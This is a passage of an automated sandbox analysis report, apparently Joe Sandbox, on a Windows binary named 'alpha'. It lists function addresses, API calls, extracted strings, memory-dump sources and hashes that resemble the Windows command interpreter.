                                                                                                                                                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                        • Instruction ID: 9c13c1979446f7af8cd0720ea07126c0af3c989738780fd673ed8b4a80074967
                                                                                                                                                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F0BE22B0978680EA44CB76B94522962909F88BF0F088330EA7C87BC9EE3CD452C305

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00007FF6E9425B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                                                                        • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                                                                        • API String ID: 1388555566-2647954630
                                                                                                                                                                        • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                                                                                        • Instruction ID: 77d8c78c8941329b874d3fd7965f243c754ac4e1d10f877850494558fc8204e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                                                                                        • Instruction Fuzzy Hash: 05A29173A08B82C6EB149F65A8143B96BA1FF89B44F408135DE0E87795DF3EE409C706
                                                                                                                                                                        Function 00007FF6E942E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                                                                                        • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                                                                                        • API String ID: 511550188-726566285
                                                                                                                                                                        • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                                                                        • Instruction ID: 9a6d1f9b86eb519e638a8dc34a24105f564dad644f0768e965b1b05309eaef5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E529E33A1C692C6EB248F25A41437A6AA1FF49B44F448135DE4EC3794DF3EE849C70A
                                                                                                                                                                        Function 00007FF6E9429E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                                                                                        • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                                                                                        • API String ID: 1738779099-3004636944
                                                                                                                                                                        • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                                                                        • Instruction ID: 453798829dc597a1d69e8d0c3fd9e10b2d5feb1754f5b24081138f83b717136a
                                                                                                                                                                        • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A727933A18652DAEB208FA594143BD37E1BF44B88F418135DE4DD7794EE3EA849C30A
                                                                                                                                                                        Function 00007FF6E9447F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F44
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9447F5C
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F9E
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447FFF
                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448020
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448036
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448061
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9448075
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94480D6
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E94480EA
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E9448177
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E944819A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481BD
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481DC
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481FB
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E944821A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E9448239
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448291
                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482D7
                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482FB
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944831A
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448364
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9448378
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944839A
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483AE
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483E6
                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448403
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448418
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                        • Instruction ID: 64c141f5960ffc301e84fbf8ddf36efad37f035086e6f1b72eb1c9e0130c0058
                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                        • Instruction Fuzzy Hash: 73E19273A18652CAE7109F65E4042BD7AA1FF49B95B448231DD1E93790EF3EA40DCB09
                                                                                                                                                                        Function 00007FF6E9423F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                                                                        • String ID: %s$%s
                                                                                                                                                                        • API String ID: 3623545644-3518022669
                                                                                                                                                                        • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                                                                                        • Instruction ID: 24104f780911271289b88b924450b4f99f0dd371d84d029ecd18e55bc34398d9
                                                                                                                                                                        • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 4ED27D73A08682CAEB649F6198403BD67A1FF85748F104139DA4EC7B95DF3EE449CB06
                                                                                                                                                                        Function 00007FF6E9422C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                                                                                        • String ID: %9d$%s
                                                                                                                                                                        • API String ID: 4286035211-3662383364
                                                                                                                                                                        • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                                                                                        • Instruction ID: d913c86c7fe708f27ed1981b2968c8bd0abd5f38ae246691a2a39f214a94ca92
                                                                                                                                                                        • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                                                                                        • Instruction Fuzzy Hash: D3528E73A08A82CAEB259F64A8503F977A0FF89B98F404135DA0E87B94DF3DD549C705
                                                                                                                                                                        Function 00007FF6E94318D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsrchr$towlower
                                                                                                                                                                        • String ID: fdpnxsatz
                                                                                                                                                                        • API String ID: 3267374428-1106894203
                                                                                                                                                                        • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                                                                                        • Instruction ID: 7fbc8517a5ea301a47205d09eacb627bf9066d4695ebac4fe71d7381dfbcf46a
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D42CE63B18A82C6EB64DF3598583B966A1FF49B94F148135DE0E87784DE3EE848C305
                                                                                                                                                                        Function 00007FF6E9427650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                        • API String ID: 95024817-2010427443
                                                                                                                                                                        • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                                                                        • Instruction ID: 94554807d9b7b6c50fe2ad7252fc9aaa1b388e8b76f07caf872351eee5fdb1e0
                                                                                                                                                                        • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                                                                        • Instruction Fuzzy Hash: BD12C273A18686C6EB648F21A440279B7E1FF89B54F444239EA4ED3794DF3EE409CB05
                                                                                                                                                                        Function 00007FF6E9425240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                        • API String ID: 0-1980097535
                                                                                                                                                                        • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                                                                        • Instruction ID: cd2c3e8337b032f703e9b47ed6e1c03cf246780f42a8231bfb6ff574bdc92315
                                                                                                                                                                        • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                                                                        • Instruction Fuzzy Hash: A4327B73A08682C6EB24DF61A5443F973A0FF45B88F414135DA0D87699DF3EE549CB0A
                                                                                                                                                                        Function 00007FF6E9426EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                        • API String ID: 1795611712-3662956551
                                                                                                                                                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                        • Instruction ID: 21253b5ab56a8772e7899d5345f59ae2062f679e01beaf10c1c7c9d0614be432
                                                                                                                                                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                        • Instruction Fuzzy Hash: 71E19C73A08646C6EB209F64A8443FD66A1BF88788F544132DA0EC7795DE3EE50DC74A
                                                                                                                                                                        Function 00007FF6E944EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF6E944EF33
                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EF98
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFA9
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFBF
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E944EFDC
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFED
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F003
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F022
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F083
                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F092
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F0A5
                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF6E944F0DB
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F135
